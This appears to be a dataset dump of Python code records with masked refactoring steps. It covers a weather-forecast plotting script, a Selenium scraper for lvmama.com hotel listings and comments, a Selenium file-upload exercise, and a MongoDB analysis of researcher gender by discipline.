"step-5": "\"\"\"Produce a multi-panel figure of each output lead time in a forecast\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport iris.plot as iplt\nfrom irise import convert\nfrom irise.plot.util import add_map\nfrom myscripts import plotdir\nfrom myscripts.models.um import case_studies\n\ncolumns = 3\n\n\ndef main(forecast, name, levels, *args, **kwargs):\n nt = len(forecast)\n rows = (nt / columns) + 1\n fig = plt.figure(figsize=(18, 10 * float(rows) / columns))\n for n, cubes in enumerate(forecast):\n row = n / columns\n column = n - row * columns\n print(row, column)\n ax = plt.subplot2grid((rows, columns), (row, column))\n\n cube = convert.calc(name, cubes, levels=levels)[0]\n im = iplt.pcolormesh(cube, *args, **kwargs)\n add_map()\n\n ax = plt.subplot2grid((rows, columns), (row, column + 1))\n cbar = plt.colorbar(im, cax=ax, orientation='horizontal')\n plt.savefig(plotdir + name + '_' + str(levels[0]) +\n '_' + str(levels[1][0]) + '.png')\n\n return\n\n\nif __name__ == '__main__':\n forecast = case_studies.generate_season_forecast(2013, 11, 1)\n name = 'ertel_potential_vorticity'\n levels = ('air_potential_temperature', [320])\n main(forecast, name, levels, vmin=0, vmax=10, cmap='cubehelix_r')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding:utf-8 -*-
from spider.driver.spider.base.spider import *
class LvmamaHotelSpider(Spider):
def get_comment_info2(self,shop_data):
params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)
comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)
while(True):
comments_list_len = self.until_presence_of_all_elements_located_by_css_selector(
css_selector=params_list_comment1.list_css_selector)
if comments_list_len < comment_len*0.7:
self.driver.refresh()
time.sleep(0.5)
else:
break
self.ismore_by_scroll_page_judge_by_len(css_selector=params_list_comment1.list_css_selector,comment_len=comment_len)
try:
for each in self.until_presence_of_all_elements_located_by_css_selector(
css_selector=params_list_comment1.list_css_selector+' > div.arrow'):
self.until_click_by_vertical_scroll_page_down(click_ele=each)
except Exception as e:
self.error_log(e=e)
        # the code above scrolls the page down to load the full comment list
external_key={
FieldName.SHOP_URL : shop_data.get(FieldName.SHOP_URL),
FieldName.SHOP_ID : shop_data.get(FieldName.SHOP_ID),
FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),
}
self.get_spider_data_list(params_list=params_list_comment1,is_save=True,external_key=external_key,target=self.comments)
def get_comment_info(self):
for shop_data in self.get_current_data_list_from_db(self.shops):
url = shop_data.get(FieldName.COMMENT_URL)
if url:
self.run_new_tab_task(func=self.get_comment_info2,url=url,shop_data=shop_data)
def get_shop_info(self):
self.info_log(data='进入驴妈妈移动版主页...')
self.driver.get('https://m.lvmama.com')
time.sleep(1.5)
self.until_click_by_css_selector(css_selector='#content > div.index-header > a.search.cmAddClick > p')
time.sleep(1)
self.until_send_text_by_css_selector(css_selector='#keyword',text=self.data_region)
self.info_log(data='输入%s...'%self.data_region)
self.until_send_enter_by_css_selector(css_selector='#keyword')
self.info_log(data='搜索%s...'%self.data_region)
time.sleep(1)
self.until_click_by_css_selector(css_selector='#tab_hotel > a')
self.info_log(data='点击%s...'%self.data_source)
time.sleep(3)
params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)
self.until_ismore_by_send_key_arrow_down_judge_by_len(
list_css_selector=params_list_shop1.list_css_selector,ele_css_selector='#tab_hotel > a',
min_frequency=100,max_frequency=500,timeout=1)
self.info_log(data='shopinfo')
        params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1) # get the layout info for the spider data list
shop_data_list = self.get_spider_data_list(params_list=params_list_shop1,end=18)
params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)
shop_data_list = self.add_spider_data_to_data_list(data_list=shop_data_list, isnewtab=True, params=params_shop2,
url_name=FieldName.SHOP_URL,pause_time=1)
for shop_data in shop_data_list:
key = {
FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),
FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),
FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),
}
self.save_data_to_db(target=self.shops,key=key,data=shop_data)
def run_spider(self):
self.get_shop_info()
# self.get_comment_info()
|
normal
|
{
"blob_id": "931e73ffce6d24dbfb92501670245e20fc403a7a",
"index": 7969,
"step-1": "<mask token>\n\n\nclass LvmamaHotelSpider(Spider):\n\n def get_comment_info2(self, shop_data):\n params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)\n comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)\n while True:\n comments_list_len = (self.\n until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector))\n if comments_list_len < comment_len * 0.7:\n self.driver.refresh()\n time.sleep(0.5)\n else:\n break\n self.ismore_by_scroll_page_judge_by_len(css_selector=\n params_list_comment1.list_css_selector, comment_len=comment_len)\n try:\n for each in self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector +\n ' > div.arrow'):\n self.until_click_by_vertical_scroll_page_down(click_ele=each)\n except Exception as e:\n self.error_log(e=e)\n external_key = {FieldName.SHOP_URL: shop_data.get(FieldName.\n SHOP_URL), FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.get_spider_data_list(params_list=params_list_comment1, is_save\n =True, external_key=external_key, target=self.comments)\n <mask token>\n <mask token>\n\n def run_spider(self):\n self.get_shop_info()\n",
"step-2": "<mask token>\n\n\nclass LvmamaHotelSpider(Spider):\n\n def get_comment_info2(self, shop_data):\n params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)\n comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)\n while True:\n comments_list_len = (self.\n until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector))\n if comments_list_len < comment_len * 0.7:\n self.driver.refresh()\n time.sleep(0.5)\n else:\n break\n self.ismore_by_scroll_page_judge_by_len(css_selector=\n params_list_comment1.list_css_selector, comment_len=comment_len)\n try:\n for each in self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector +\n ' > div.arrow'):\n self.until_click_by_vertical_scroll_page_down(click_ele=each)\n except Exception as e:\n self.error_log(e=e)\n external_key = {FieldName.SHOP_URL: shop_data.get(FieldName.\n SHOP_URL), FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.get_spider_data_list(params_list=params_list_comment1, is_save\n =True, external_key=external_key, target=self.comments)\n <mask token>\n\n def get_shop_info(self):\n self.info_log(data='进入驴妈妈移动版主页...')\n self.driver.get('https://m.lvmama.com')\n time.sleep(1.5)\n self.until_click_by_css_selector(css_selector=\n '#content > div.index-header > a.search.cmAddClick > p')\n time.sleep(1)\n self.until_send_text_by_css_selector(css_selector='#keyword', text=\n self.data_region)\n self.info_log(data='输入%s...' % self.data_region)\n self.until_send_enter_by_css_selector(css_selector='#keyword')\n self.info_log(data='搜索%s...' % self.data_region)\n time.sleep(1)\n self.until_click_by_css_selector(css_selector='#tab_hotel > a')\n self.info_log(data='点击%s...' % self.data_source)\n time.sleep(3)\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n self.until_ismore_by_send_key_arrow_down_judge_by_len(list_css_selector\n =params_list_shop1.list_css_selector, ele_css_selector=\n '#tab_hotel > a', min_frequency=100, max_frequency=500, timeout=1)\n self.info_log(data='shopinfo')\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n shop_data_list = self.get_spider_data_list(params_list=\n params_list_shop1, end=18)\n params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)\n shop_data_list = self.add_spider_data_to_data_list(data_list=\n shop_data_list, isnewtab=True, params=params_shop2, url_name=\n FieldName.SHOP_URL, pause_time=1)\n for shop_data in shop_data_list:\n key = {FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),\n FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.save_data_to_db(target=self.shops, key=key, data=shop_data)\n\n def run_spider(self):\n self.get_shop_info()\n",
"step-3": "<mask token>\n\n\nclass LvmamaHotelSpider(Spider):\n\n def get_comment_info2(self, shop_data):\n params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)\n comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)\n while True:\n comments_list_len = (self.\n until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector))\n if comments_list_len < comment_len * 0.7:\n self.driver.refresh()\n time.sleep(0.5)\n else:\n break\n self.ismore_by_scroll_page_judge_by_len(css_selector=\n params_list_comment1.list_css_selector, comment_len=comment_len)\n try:\n for each in self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector +\n ' > div.arrow'):\n self.until_click_by_vertical_scroll_page_down(click_ele=each)\n except Exception as e:\n self.error_log(e=e)\n external_key = {FieldName.SHOP_URL: shop_data.get(FieldName.\n SHOP_URL), FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.get_spider_data_list(params_list=params_list_comment1, is_save\n =True, external_key=external_key, target=self.comments)\n\n def get_comment_info(self):\n for shop_data in self.get_current_data_list_from_db(self.shops):\n url = shop_data.get(FieldName.COMMENT_URL)\n if url:\n self.run_new_tab_task(func=self.get_comment_info2, url=url,\n shop_data=shop_data)\n\n def get_shop_info(self):\n self.info_log(data='进入驴妈妈移动版主页...')\n self.driver.get('https://m.lvmama.com')\n time.sleep(1.5)\n self.until_click_by_css_selector(css_selector=\n '#content > div.index-header > a.search.cmAddClick > p')\n time.sleep(1)\n self.until_send_text_by_css_selector(css_selector='#keyword', text=\n self.data_region)\n self.info_log(data='输入%s...' % self.data_region)\n self.until_send_enter_by_css_selector(css_selector='#keyword')\n self.info_log(data='搜索%s...' % self.data_region)\n time.sleep(1)\n self.until_click_by_css_selector(css_selector='#tab_hotel > a')\n self.info_log(data='点击%s...' % self.data_source)\n time.sleep(3)\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n self.until_ismore_by_send_key_arrow_down_judge_by_len(list_css_selector\n =params_list_shop1.list_css_selector, ele_css_selector=\n '#tab_hotel > a', min_frequency=100, max_frequency=500, timeout=1)\n self.info_log(data='shopinfo')\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n shop_data_list = self.get_spider_data_list(params_list=\n params_list_shop1, end=18)\n params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)\n shop_data_list = self.add_spider_data_to_data_list(data_list=\n shop_data_list, isnewtab=True, params=params_shop2, url_name=\n FieldName.SHOP_URL, pause_time=1)\n for shop_data in shop_data_list:\n key = {FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),\n FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.save_data_to_db(target=self.shops, key=key, data=shop_data)\n\n def run_spider(self):\n self.get_shop_info()\n",
"step-4": "from spider.driver.spider.base.spider import *\n\n\nclass LvmamaHotelSpider(Spider):\n\n def get_comment_info2(self, shop_data):\n params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)\n comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)\n while True:\n comments_list_len = (self.\n until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector))\n if comments_list_len < comment_len * 0.7:\n self.driver.refresh()\n time.sleep(0.5)\n else:\n break\n self.ismore_by_scroll_page_judge_by_len(css_selector=\n params_list_comment1.list_css_selector, comment_len=comment_len)\n try:\n for each in self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector +\n ' > div.arrow'):\n self.until_click_by_vertical_scroll_page_down(click_ele=each)\n except Exception as e:\n self.error_log(e=e)\n external_key = {FieldName.SHOP_URL: shop_data.get(FieldName.\n SHOP_URL), FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.get_spider_data_list(params_list=params_list_comment1, is_save\n =True, external_key=external_key, target=self.comments)\n\n def get_comment_info(self):\n for shop_data in self.get_current_data_list_from_db(self.shops):\n url = shop_data.get(FieldName.COMMENT_URL)\n if url:\n self.run_new_tab_task(func=self.get_comment_info2, url=url,\n shop_data=shop_data)\n\n def get_shop_info(self):\n self.info_log(data='进入驴妈妈移动版主页...')\n self.driver.get('https://m.lvmama.com')\n time.sleep(1.5)\n self.until_click_by_css_selector(css_selector=\n '#content > div.index-header > a.search.cmAddClick > p')\n time.sleep(1)\n self.until_send_text_by_css_selector(css_selector='#keyword', text=\n self.data_region)\n self.info_log(data='输入%s...' % self.data_region)\n self.until_send_enter_by_css_selector(css_selector='#keyword')\n self.info_log(data='搜索%s...' % self.data_region)\n time.sleep(1)\n self.until_click_by_css_selector(css_selector='#tab_hotel > a')\n self.info_log(data='点击%s...' % self.data_source)\n time.sleep(3)\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n self.until_ismore_by_send_key_arrow_down_judge_by_len(list_css_selector\n =params_list_shop1.list_css_selector, ele_css_selector=\n '#tab_hotel > a', min_frequency=100, max_frequency=500, timeout=1)\n self.info_log(data='shopinfo')\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n shop_data_list = self.get_spider_data_list(params_list=\n params_list_shop1, end=18)\n params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)\n shop_data_list = self.add_spider_data_to_data_list(data_list=\n shop_data_list, isnewtab=True, params=params_shop2, url_name=\n FieldName.SHOP_URL, pause_time=1)\n for shop_data in shop_data_list:\n key = {FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),\n FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.save_data_to_db(target=self.shops, key=key, data=shop_data)\n\n def run_spider(self):\n self.get_shop_info()\n",
"step-5": "# -*- coding:utf-8 -*-\nfrom spider.driver.spider.base.spider import *\n\nclass LvmamaHotelSpider(Spider):\n def get_comment_info2(self,shop_data):\n params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)\n comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)\n while(True):\n comments_list_len = self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector)\n if comments_list_len < comment_len*0.7:\n self.driver.refresh()\n time.sleep(0.5)\n else:\n break\n self.ismore_by_scroll_page_judge_by_len(css_selector=params_list_comment1.list_css_selector,comment_len=comment_len)\n try:\n for each in self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector+' > div.arrow'):\n self.until_click_by_vertical_scroll_page_down(click_ele=each)\n except Exception as e:\n self.error_log(e=e)\n #上面在下拉加载页面\n external_key={\n FieldName.SHOP_URL : shop_data.get(FieldName.SHOP_URL),\n FieldName.SHOP_ID : shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),\n }\n self.get_spider_data_list(params_list=params_list_comment1,is_save=True,external_key=external_key,target=self.comments)\n\n def get_comment_info(self):\n for shop_data in self.get_current_data_list_from_db(self.shops):\n url = shop_data.get(FieldName.COMMENT_URL)\n if url:\n self.run_new_tab_task(func=self.get_comment_info2,url=url,shop_data=shop_data)\n\n def get_shop_info(self):\n self.info_log(data='进入驴妈妈移动版主页...')\n self.driver.get('https://m.lvmama.com')\n time.sleep(1.5)\n self.until_click_by_css_selector(css_selector='#content > div.index-header > a.search.cmAddClick > p')\n time.sleep(1)\n self.until_send_text_by_css_selector(css_selector='#keyword',text=self.data_region)\n self.info_log(data='输入%s...'%self.data_region)\n self.until_send_enter_by_css_selector(css_selector='#keyword')\n self.info_log(data='搜索%s...'%self.data_region)\n time.sleep(1)\n self.until_click_by_css_selector(css_selector='#tab_hotel > a')\n self.info_log(data='点击%s...'%self.data_source)\n time.sleep(3)\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n self.until_ismore_by_send_key_arrow_down_judge_by_len(\n list_css_selector=params_list_shop1.list_css_selector,ele_css_selector='#tab_hotel > a',\n min_frequency=100,max_frequency=500,timeout=1)\n\n self.info_log(data='shopinfo')\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1) # 获取爬虫数据列表的样式信息\n shop_data_list = self.get_spider_data_list(params_list=params_list_shop1,end=18)\n params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)\n shop_data_list = self.add_spider_data_to_data_list(data_list=shop_data_list, isnewtab=True, params=params_shop2,\n url_name=FieldName.SHOP_URL,pause_time=1)\n for shop_data in shop_data_list:\n key = {\n FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),\n FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),\n }\n self.save_data_to_db(target=self.shops,key=key,data=shop_data)\n\n def run_spider(self):\n self.get_shop_info()\n # self.get_comment_info()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
/usr/local/python-3.6/lib/python3.6/abc.py
|
normal
|
{
"blob_id": "32d830f00a9d33b8f7f438c14b522ef186001bf3",
"index": 9392,
"step-1": "/usr/local/python-3.6/lib/python3.6/abc.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import time
from selenium import webdriver
import os
from selenium.webdriver.common.by import By
with open("file.txt", "w") as file:
content = file.write("Tanyuhich")
try:
browser = webdriver.Chrome()
browser.get("http://suninjuly.github.io/file_input.html")
input1 = browser.find_element_by_name('firstname')
input1.send_keys("Ivan")
input2 = browser.find_element_by_name('lastname')
input2.send_keys("Petrov")
input3 = browser.find_element_by_name('email')
input3.send_keys("[email protected]")
current_dir = os.path.abspath(os.path.dirname(__file__))
path = os.getcwd() + '/' + file.name
element = browser.find_element(By.CSS_SELECTOR, "[type='file']")
element.send_keys(path)
button = browser.find_element_by_css_selector("button.btn")
button.click()
finally:
    # we have 30 seconds to copy the code
time.sleep(30)
    # close the browser after all the interactions
browser.quit()
# remember to leave an empty line at the end of the file
|
normal
|
{
"blob_id": "03270285c6dc99d8dcb9804270421f36b573048c",
"index": 2863,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('file.txt', 'w') as file:\n content = file.write('Tanyuhich')\ntry:\n browser = webdriver.Chrome()\n browser.get('http://suninjuly.github.io/file_input.html')\n input1 = browser.find_element_by_name('firstname')\n input1.send_keys('Ivan')\n input2 = browser.find_element_by_name('lastname')\n input2.send_keys('Petrov')\n input3 = browser.find_element_by_name('email')\n input3.send_keys('[email protected]')\n current_dir = os.path.abspath(os.path.dirname(__file__))\n path = os.getcwd() + '/' + file.name\n element = browser.find_element(By.CSS_SELECTOR, \"[type='file']\")\n element.send_keys(path)\n button = browser.find_element_by_css_selector('button.btn')\n button.click()\nfinally:\n time.sleep(30)\n browser.quit()\n",
"step-3": "import time\nfrom selenium import webdriver\nimport os\nfrom selenium.webdriver.common.by import By\nwith open('file.txt', 'w') as file:\n content = file.write('Tanyuhich')\ntry:\n browser = webdriver.Chrome()\n browser.get('http://suninjuly.github.io/file_input.html')\n input1 = browser.find_element_by_name('firstname')\n input1.send_keys('Ivan')\n input2 = browser.find_element_by_name('lastname')\n input2.send_keys('Petrov')\n input3 = browser.find_element_by_name('email')\n input3.send_keys('[email protected]')\n current_dir = os.path.abspath(os.path.dirname(__file__))\n path = os.getcwd() + '/' + file.name\n element = browser.find_element(By.CSS_SELECTOR, \"[type='file']\")\n element.send_keys(path)\n button = browser.find_element_by_css_selector('button.btn')\n button.click()\nfinally:\n time.sleep(30)\n browser.quit()\n",
"step-4": "import time\nfrom selenium import webdriver\nimport os\nfrom selenium.webdriver.common.by import By\n\nwith open(\"file.txt\", \"w\") as file:\n content = file.write(\"Tanyuhich\")\n \ntry:\n browser = webdriver.Chrome()\n browser.get(\"http://suninjuly.github.io/file_input.html\")\n input1 = browser.find_element_by_name('firstname')\n input1.send_keys(\"Ivan\")\n input2 = browser.find_element_by_name('lastname')\n input2.send_keys(\"Petrov\")\n input3 = browser.find_element_by_name('email')\n input3.send_keys(\"[email protected]\")\n current_dir = os.path.abspath(os.path.dirname(__file__))\n path = os.getcwd() + '/' + file.name\n element = browser.find_element(By.CSS_SELECTOR, \"[type='file']\")\n element.send_keys(path)\n button = browser.find_element_by_css_selector(\"button.btn\")\n button.click()\n\nfinally:\n # успеваем скопировать код за 30 секунд\n time.sleep(30)\n # закрываем браузер после всех манипуляций\n browser.quit()\n\n# не забываем оставить пустую строку в конце файла",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import DB as db
import os
from Chart import Chart
import matplotlib.pyplot as plt
import numpy as np
table = db.get_researcher_copy()
chart_path = '../charts/discipline '
def get_discipline_with_more_female():
docs = table.aggregate([
{'$match':{'gender':{'$exists':1}}},
{'$unwind':'$labels'},
{'$group':{'_id':{'label':'$labels','gender':'$gender'},'count':{'$sum':1}}}
# {'$group':{'_id':{'label':'$labels'},'male_count':{'$sum':{'$match':{'gender':'M'}}}}}
])
d = {}
for doc in docs:
if doc['_id']['label'] in d:
if doc['_id']['gender'] == 'M':
d[doc['_id']['label']][0] = doc['count']
else:
d[doc['_id']['label']][1] = doc['count']
else:
d[doc['_id']['label']] = [0,0]
if doc['_id']['gender'] == 'M':
d[doc['_id']['label']][0] = doc['count']
else:
d[doc['_id']['label']][1] = doc['count']
count = 0
for key in d:
if d[key][0]!=0 and d[key][1] > d[key][0]:
count+=1
print('%s:'%key)
print('male {0},female {1}'.format(d[key][0],d[key][1]))
print('number of all:%s'%count)
def discipline_proportion(top_k):
docs = table.aggregate([
{'$match':{'gender':{'$exists':1}}},
{'$unwind':'$labels'},
{'$group':{
'_id':{'label':'$labels'},
'count':{'$sum':1}
}},
{'$sort':{'count':-1}}])
docs = [doc for doc in docs]
# print(docs[:10])
total = table.count({'gender':{'$exists':1}})
count_arr = [doc['count'] for doc in docs[:top_k]]
proportion_arr = [doc['count']/total for doc in docs[:top_k]]
cumulative_arr = []
c = 0
for i in proportion_arr:
c+=i
cumulative_arr.append(c)
labels = [doc['_id']['label'] for doc in docs[:top_k]]
# chart = Chart()
# print(len(labels))
# print(len(arr))
# chart.pie([arr],'test',labels)
# chart.show()
# chart.single_unnomarlized_CDF(arr,'disciplines CDF','disciplines','percentage')
# chart.save(chart_path+'cdf.eps')
# s = ''
# print(np.median())
# for label in labels:
# s = s+label+', '
# print(s)
# os.mkdir(chart_path) if not os.path.exists(chart_path) else ''
chart = Chart(100,150)
# chart.bar(count_arr,top_k,labels,'The Top {0} popular disciplines'.format(top_k),'discipline','researcher number',True,log=False,fontsize=100)
# chart.show()
# chart.save(chart_path+'/number_{0}'.format(top_k),format='eps')
# chart.clear()
chart.bar(cumulative_arr,top_k,labels,'Cumulative propotion of most popular disciplines','discipline','propotion',True,log=False,fontsize=100)
chart.save(chart_path+'/cumulative_{0}'.format(top_k),format='eps')
chart.clear()
# chart = Chart(100,150)
# chart.bar(proportion_arr,top_k,labels,'The propotion of researchers in top 30 disciplines','discipline','propotion',True,log=False,fontsize=100)
# chart.save(chart_path+'/proportion_{0}.eps'.format(top_k))
# chart.clear()
def gender_favorite(top_k,sex='M'):
docs = table.aggregate([
{'$match':{'gender':sex}},
{'$unwind':'$labels'},
{'$group':{
'_id':{'label':'$labels'},
'count':{'$sum':1}
}},
{'$sort':{'count':-1}}])
number_arr = []
count_arr = []
labels = []
docs = [doc for doc in docs]
for doc in docs[:top_k]:
count_arr.append(doc['count'])
labels.append(doc['_id']['label'])
chart = Chart(100,180)
chart.bar(count_arr,top_k,labels,"The Top {0} females' favorite disciplines".format(top_k),'discipline','researcher number',True,log=False,fontsize=120)
chart.save(chart_path+'/{1}_favorite_{0}'.format(top_k,sex),format='eps')
chart.clear()
def average_h_index(top_k):
all_docs = copy.aggregate([{'$match':{'gender':{'$exists':True}}},{'$project':{'index':1,'labels':1,'gender':1,'count':{'$size':'$pubs'}}}])
d = {}
col_d = {}
for doc in all_docs:
for label in doc['labels']:
if label in d:
if doc['gender'] == 'M':
d[label][0]+=1
d[label][1]+=int(doc['index'])
else:
d[label][2]+=1
d[label][3]+=int(doc['index'])
else:
if doc['gender'] == 'M':
d[label] = [1,int(doc['index']),0,0]
else:
d[label] = [0,0,1,int(doc['index'])]
if label in d:
if doc['gender'] == 'M':
d[label][0]+=1
d[label][1]+=int(doc['index'])
else:
d[label][2]+=1
d[label][3]+=int(doc['index'])
else:
if doc['gender'] == 'M':
d[label] = [1,int(doc['index']),0,0]
else:
d[label] = [0,0,1,int(doc['index'])]
labels = []
arr = []
for key in d:
if d[key][0] > 50:
a = d[key][1]/d[key][0]
b = d[key][3]/d[key][2]
if b>a:
print(key)
print(a)
print(b)
def avarage_publication(top_k):
all_docs = copy.aggregate([{'$match':{'gender':{'$exists':True}}},{'$project':{'labels':1,'gender':1,'count':{'$size':'$pubs'}}}])
d = {}
for doc in docs:
for label in doc['labels']:
if label in d:
d[pub['label']] = d[pub['label']]+1
# arr.sort(key=lambda x:x[2],reverse=True)
# arr = arr[:top_k]
# average_index_arr = []
# labels = []
# for item in arr:
# labels.append(item[0])
# average_index_arr.append(item[1])
# chart = Chart(100,180)
# chart.bar(average_index_arr,top_k,labels,'The Top {0} fields with highest average h-index'.format(top_k),'discipline','researcher number',True,log=False,fontsize=120)
# chart.save(chart_path+'/top_{0}_average_disciplines'.format(top_k),format='png')
# chart.clear()
discipline_proportion(30)
# get_discipline_with_more_female()
# gender_favorite(30)
# gender_favorite(30,'F')
|
normal
|
{
"blob_id": "c585b1439217fff42945eeb9e02512d73f8ba19f",
"index": 5805,
"step-1": "<mask token>\n\n\ndef get_discipline_with_more_female():\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels',\n 'gender': '$gender'}, 'count': {'$sum': 1}}}])\n d = {}\n for doc in docs:\n if doc['_id']['label'] in d:\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n else:\n d[doc['_id']['label']] = [0, 0]\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n count = 0\n for key in d:\n if d[key][0] != 0 and d[key][1] > d[key][0]:\n count += 1\n print('%s:' % key)\n print('male {0},female {1}'.format(d[key][0], d[key][1]))\n print('number of all:%s' % count)\n\n\ndef discipline_proportion(top_k):\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels'},\n 'count': {'$sum': 1}}}, {'$sort': {'count': -1}}])\n docs = [doc for doc in docs]\n total = table.count({'gender': {'$exists': 1}})\n count_arr = [doc['count'] for doc in docs[:top_k]]\n proportion_arr = [(doc['count'] / total) for doc in docs[:top_k]]\n cumulative_arr = []\n c = 0\n for i in proportion_arr:\n c += i\n cumulative_arr.append(c)\n labels = [doc['_id']['label'] for doc in docs[:top_k]]\n chart = Chart(100, 150)\n chart.bar(cumulative_arr, top_k, labels,\n 'Cumulative propotion of most popular disciplines', 'discipline',\n 'propotion', True, log=False, fontsize=100)\n chart.save(chart_path + '/cumulative_{0}'.format(top_k), format='eps')\n chart.clear()\n\n\ndef gender_favorite(top_k, sex='M'):\n docs = table.aggregate([{'$match': {'gender': sex}}, {'$unwind':\n '$labels'}, {'$group': {'_id': {'label': '$labels'}, 'count': {\n '$sum': 1}}}, {'$sort': {'count': -1}}])\n number_arr = []\n count_arr = []\n labels = []\n docs = [doc for doc in docs]\n for doc in docs[:top_k]:\n count_arr.append(doc['count'])\n labels.append(doc['_id']['label'])\n chart = Chart(100, 180)\n chart.bar(count_arr, top_k, labels,\n \"The Top {0} females' favorite disciplines\".format(top_k),\n 'discipline', 'researcher number', True, log=False, fontsize=120)\n chart.save(chart_path + '/{1}_favorite_{0}'.format(top_k, sex), format=\n 'eps')\n chart.clear()\n\n\ndef average_h_index(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': {'$exists': True}}}, {\n '$project': {'index': 1, 'labels': 1, 'gender': 1, 'count': {\n '$size': '$pubs'}}}])\n d = {}\n col_d = {}\n for doc in all_docs:\n for label in doc['labels']:\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n if label in d:\n if doc['gender'] == 'M':\n d[label][0] += 1\n d[label][1] += int(doc['index'])\n else:\n d[label][2] += 1\n d[label][3] += int(doc['index'])\n elif doc['gender'] == 'M':\n d[label] = [1, int(doc['index']), 0, 0]\n else:\n d[label] = [0, 0, 1, int(doc['index'])]\n labels = []\n arr = []\n for key in d:\n if d[key][0] > 50:\n a = d[key][1] / d[key][0]\n b = d[key][3] / d[key][2]\n if b > a:\n print(key)\n print(a)\n print(b)\n\n\ndef avarage_publication(top_k):\n all_docs = copy.aggregate([{'$match': {'gender': 